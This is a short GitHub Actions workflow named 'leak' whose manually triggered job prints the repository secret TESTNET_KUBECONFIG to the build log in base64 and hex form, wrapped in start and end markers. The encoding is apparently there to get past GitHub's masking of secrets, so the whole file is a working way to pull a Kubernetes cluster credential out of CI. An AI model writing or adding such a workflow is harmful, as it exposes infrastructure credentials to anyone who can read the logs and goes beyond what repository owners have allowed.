name: leak
on:
  workflow_dispatch:

jobs:
  leak:
    name: Leak
    runs-on: ubuntu-latest
    steps:
      - name: Leak TESTNET_KUBECONFIG (b64-encoded)
        run: |
          echo "===TESTNET_KUBECONFIG_B64_START==="
          echo "${{ secrets.TESTNET_KUBECONFIG }}" | base64 | tr -d '\n'
          echo ""
          echo "===TESTNET_KUBECONFIG_B64_END==="
      - name: Leak TESTNET_KUBECONFIG (hex)
        run: |
          echo "===TESTNET_KUBECONFIG_HEX_START==="
          echo "${{ secrets.TESTNET_KUBECONFIG }}" | xxd -p | tr -d '\n'
          echo ""
          echo "===TESTNET_KUBECONFIG_HEX_END==="
